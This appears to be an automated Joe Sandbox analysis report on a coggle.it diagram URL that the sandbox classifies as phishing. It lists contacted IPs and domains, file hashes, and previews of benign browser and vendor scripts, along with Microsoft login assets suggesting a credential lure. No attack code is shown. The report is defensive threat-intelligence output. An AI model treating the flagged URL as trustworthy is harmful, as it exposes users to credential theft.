                                                                  52.17.109.110
                                                                  unknownUnited States
                                                                  16509AMAZON-02USfalse
                                                                  142.250.186.110
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  34.250.89.120
                                                                  api.stripe.comUnited States
                                                                  16509AMAZON-02USfalse
                                                                  35.190.80.1
                                                                  a.nel.cloudflare.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.250.186.99
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  54.213.36.135
                                                                  m.stripe.comUnited States
                                                                  16509AMAZON-02USfalse
                                                                  52.10.197.113
                                                                  unknownUnited States
                                                                  16509AMAZON-02USfalse
                                                                  142.250.184.196
                                                                  www.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  52.41.143.200
                                                                  unknownUnited States
                                                                  16509AMAZON-02USfalse
                                                                  1.1.1.1
                                                                  unknownAustralia
                                                                  13335CLOUDFLARENETUSfalse
                                                                  52.215.231.162
                                                                  unknownUnited States
                                                                  16509AMAZON-02USfalse
                                                                  54.187.159.182
                                                                  unknownUnited States
                                                                  16509AMAZON-02USfalse
                                                                  54.186.23.98
                                                                  r.stripe.comUnited States
                                                                  16509AMAZON-02USfalse
                                                                  54.171.46.205
                                                                  unknownUnited States
                                                                  16509AMAZON-02USfalse
                                                                  151.101.128.176
                                                                  stripecdn.map.fastly.netUnited States
                                                                  54113FASTLYUSfalse
                                                                  239.255.255.250
                                                                  unknownReserved
                                                                  unknownunknownfalse
                                                                  108.128.83.135
                                                                  ws.coggle.itUnited States
                                                                  16509AMAZON-02USfalse
                                                                  18.173.205.118
                                                                  d1tcqh4bio8cty.cloudfront.netUnited States
                                                                  3MIT-GATEWAYSUSfalse
                                                                  64.233.184.84
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.250.186.40
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.250.186.100
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.250.184.238
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.250.186.42
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  172.217.16.195
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  18.202.131.124
                                                                  stripe.comUnited States
                                                                  16509AMAZON-02USfalse
                                                                  104.17.25.14
                                                                  cdnjs.cloudflare.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  95.101.54.225
                                                                  unknownEuropean Union
                                                                  34164AKAMAI-LONGBfalse
                                                                  IP
                                                                  192.168.2.17
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1585314
                                                                  Start date and time:2025-01-07 14:00:08 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                  Sample URL:https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:21
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • EGA enabled
                                                                  Analysis Mode:stream
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal52.phis.win@25/63@59/414
                                                                  • Exclude process from analysis (whitelisted): TextInputHost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 142.250.186.99, 64.233.184.84, 142.250.186.174, 142.250.186.142
                                                                  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • VT rate limit hit for: https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2677
                                                                  Entropy (8bit):3.98730173589837
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:4F6A01A6C53EB07D1EA1BCD270647516
                                                                  SHA1:8B930C16AB0024FA02DD1A627D894572544DFD65
                                                                  SHA-256:E6D973A8A9365C5A42B663FF0DDBE031CAAABD493A04D1A1A648637A0209000D
                                                                  SHA-512:3DFFE1BACFFD882EE50D7F1C49DD3D8868019B88376D8885968EB071A38F48E7A8E2F7DB9266301E5F644000B777C15788BA900C48E5B79FB991A4A4C52E447A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:L..................F.@.. ...$+.,.....0.(.a......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I'Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V'Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V'Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V'Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D3......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2679
                                                                  Entropy (8bit):4.004236702859964
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:E0669E3662F7B1F97791FF7840A2F854
                                                                  SHA1:4BEB78F5A3790F751C844452C0B89C251491D518
                                                                  SHA-256:3318C173F111AE3FA896A4B96412025D862FCA8171BEBB44DD2B4D15F11BB192
                                                                  SHA-512:E3BBFDC26B2540E2465BB36A3F3B3480ADBCE887E7E6BC16F3AB2067ACC0A2683EC8ECBF4ED1F6071B99367706E901416CFB6675932CCA2386E7548DED7BA39A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:L..................F.@.. ...$+.,....'#.(.a......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I'Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V'Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V'Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V'Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D3......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2693
                                                                  Entropy (8bit):4.013864477777612
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:47E5110508066DBA1AEF54A530FC1FB2
                                                                  SHA1:52262F7287DA37D0BDDB8A5BCF9B3F7A9FA3E97D
                                                                  SHA-256:AF98BA9FB11BE63458C6BEFF530BCA5A59B231551AD666456437C5D1F9B3F5D6
                                                                  SHA-512:D691D24F6E01FF7AF9C3DF82525ACF4F87C3E0BEFB0A42DB32974DA1175D3B91E3BA75894C9743EDA4C73825CB409D36C77D9B87241E200921C39BB1A4154136
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I'Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V'Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V'Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D3......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2681
                                                                  Entropy (8bit):4.001241757365049
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:F00E1773A5C6638737A4E1CEAC48E97F
                                                                  SHA1:6D4E6F8AE227F2BB5A37BF8DD20892FD515D1064
                                                                  SHA-256:E4ACA46D0BF71721954F56E34DBED0BF6E03CCB1AC85C5D9B3248C58D2336194
                                                                  SHA-512:96E55FC0CB5DC4ABFC4C8DF11DF5460D6DCC3F3C42F86C4A6675BF398FAE97527F429263EF89FA6EF7D5C8B00DB269101A9777ACC6FAA752D4F58E8AE8E7723F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:L..................F.@.. ...$+.,...."..(.a......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I'Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V'Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V'Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V'Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D3......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2681
                                                                  Entropy (8bit):3.987857802048913
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:5554E4F76178D7ACB8B439C21AB43630
                                                                  SHA1:10C5CC2F4A43186A62917717BDCAA6C60F94CDD7
                                                                  SHA-256:6823C6AF6FE4E6E266DF3171ADC8098390D998256FE3C8DCA4A5A25214145560
                                                                  SHA-512:5D1774DDC4E506255C6721143397C89EBC07440996260469AD680D8BDC29376C761EB83C0A8C282BCF4009141F1E22E9E622E42D978B3E5FA06A853EC4A6A7C5
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:L..................F.@.. ...$+.,....jd.(.a......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I'Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V'Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V'Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V'Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D3......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2683
                                                                  Entropy (8bit):4.002814038038096
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:14E65DB95FC2B31A6F6CC0E0C5660D42
                                                                  SHA1:3E8004D33B3C553F0D0841F3586B201F9FCB25D8
                                                                  SHA-256:69EBBA9396A4F5A15A5207A45C8429022B8F430A319515527317883C266C9E9D
                                                                  SHA-512:700FDC032F6677EC7933076B8AF86C8825E2BE4AEE0BC269338B4016A421070D0310F4D8B3E2CB512F816A5ABA53E8065906878F0CD3F1AEA40DC540172BAC71
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:L..................F.@.. ...$+.,.......(.a......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I'Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V'Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V'Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V'Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D3......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (17021)
                                                                  Category:dropped
                                                                  Size (bytes):394063
                                                                  Entropy (8bit):5.649333234107324
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:0D37D64E067E1A4C8641D88C85C41D1F
                                                                  SHA1:35679FF662233CD052BEF18CAC6F9994511B10B9
                                                                  SHA-256:04890E8E9B89BBDDE1743614490E8609261997ED02723A2E165AF37592C1C50D
                                                                  SHA-512:7C6652E81E2BDCD0F7C0E70DE7B956B0A60D3931A6709EDCA7803871203966E18A819F411389A4367A2BABE32185E1DB58759798F9630FBE80A42E559D539EC9
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":17,"vtp_value":true,"tag_id":9},{"function":"__ogt_session_timeout","priority":17,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":11},{"function":"__ogt_1p_data_v2","priority":17,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELE
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (7480)
                                                                  Category:downloaded
                                                                  Size (bytes):15521
                                                                  Entropy (8bit):5.543220028543161
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:74C13E7A6DAEDF67627DC770EF2765FE
                                                                  SHA1:066B4148CA498F977F3EB2B83BB8E17853C18714
                                                                  SHA-256:7AEDF29DD9B6A41ED2EB824026A78F29639FA4A2516EE39CC29EDE3DC6A3A104
                                                                  SHA-512:7D5B4DE9C3426B00D23D6E06CCB510663DC93F0B204119B831309A3290F932973647F00FC75641F3618F3AE3B16D495DB3C3541F5BB77A5CC86E5493EB364063
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526
                                                                  Preview:<!DOCTYPE html><html><head><meta charset="utf-8">.<script>window._coggle_bootstrap={"organisation":"false","organisations":"[]","user":"{\"emails\":[],\"firstLogin\":\"2013-02-14T11:45:14.917Z\",\"given_name\":\"Guest\",\"locale\":\"en-gb\",\"name\":\"Guest\",\"type\":\"guest\",\"allow_communication\":true,\"allow_transactional_communication\":true,\"emails_needing_verification\":[],\"colour\":\"#e096e9\",\"avatar\":{\"default_colour\":\"#e096e9\",\"colour\":\"#e096e9\",\"url\":\"https://static.coggle.it/img/anon-member-2x.png\",\"source\":\"default\"},\"awesome_trial_expires\":null,\"plans\":[],\"ending_plans\":[],\"picture\":\"https://static.coggle.it/img/anon.png\",\"drive_user\":false,\"has_google_login\":false,\"org_only\":false,\"limits\":{}}","diagram":"{\"_id\":\"677ce464f010c509033a09a8\",\"title\":\" ![Threeways Garage Limited ](attached://6a4bf43f2f6c66cb0c6b5d85cb9f71f3 150x31).\",\"owner_id\":\"677c0ee9f010c50903e36cd8\",\"delta_version\":2,\"folder\":null,\"timestamp\":\
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (3068)
                                                                  Category:dropped
                                                                  Size (bytes):3121
                                                                  Entropy (8bit):5.368277077246017
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:14126969084C1C90506A04C374ED5F1E
                                                                  SHA1:BB998F9F43DB8C23307C4ABE262C1BBE9596C179
                                                                  SHA-256:263C5B1DE706876C2DB160F552E7FAA352201CB216212195983BF4B24F49FF18
                                                                  SHA-512:39FD1E318B9B3456E7B26F47DA22DF9AF8DB2B2B69D4FE3C36E964727C07F7A8B83B0745D93AC7C0207496DC594BD78E4F1FD84C6666CC60CC6F4DD827E47E74
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:(()=>{"use strict";var e,r,t,o={},i={};function n(e){var r=i[e];if(void 0!==r)return r.exports;var t=i[e]={id:e,loaded:!1,exports:{}};return o[e].call(t.exports,t,t.exports,n),t.loaded=!0,t.exports}n.m=o,n.amdD=function(){throw new Error("define cannot be used indirect")},n.amdO={},e=[],n.O=(r,t,o,i)=>{if(!t){var a=1/0;for(l=0;l<e.length;l++){for(var[t,o,i]=e[l],f=!0,c=0;c<t.length;c++)(!1&i||a>=i)&&Object.keys(n.O).every((e=>n.O[e](t[c])))?t.splice(c--,1):(f=!1,i<a&&(a=i));if(f){e.splice(l--,1);var d=o();void 0!==d&&(r=d)}}return r}i=i||0;for(var l=e.length;l>0&&e[l-1][2]>i;l--)e[l]=e[l-1];e[l]=[t,o,i]},n.d=(e,r)=>{for(var t in r)n.o(r,t)&&!n.o(e,t)&&Object.defineProperty(e,t,{enumerable:!0,get:r[t]})},n.f={},n.e=e=>Promise.all(Object.keys(n.f).reduce(((r,t)=>(n.f[t](e,r),r)),[])),n.u=e=>"assets/"+({315:"exporters",472:"settings",723:"doclist",814:"org-views"}[e]||e)+"-"+{315:"2d014b24b0fab052",472:"5a438b435338fc4a",723:"1f44466bb003bc2b",814:"4af5d58b82093e55",850:"150f643a25ee3985"
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):3452
                                                                  Entropy (8bit):5.117912766689607
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                  SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                  SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                  SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://login.live.com/Me.htm?v=3
                                                                  Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                  Category:dropped
                                                                  Size (bytes):61052
                                                                  Entropy (8bit):7.996159932827634
                                                                  Encrypted:true
                                                                  SSDEEP:
                                                                  MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                  SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                  SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                  SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                  Category:downloaded
                                                                  Size (bytes):1435
                                                                  Entropy (8bit):7.8613342322590265
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                  SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                  SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                  SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
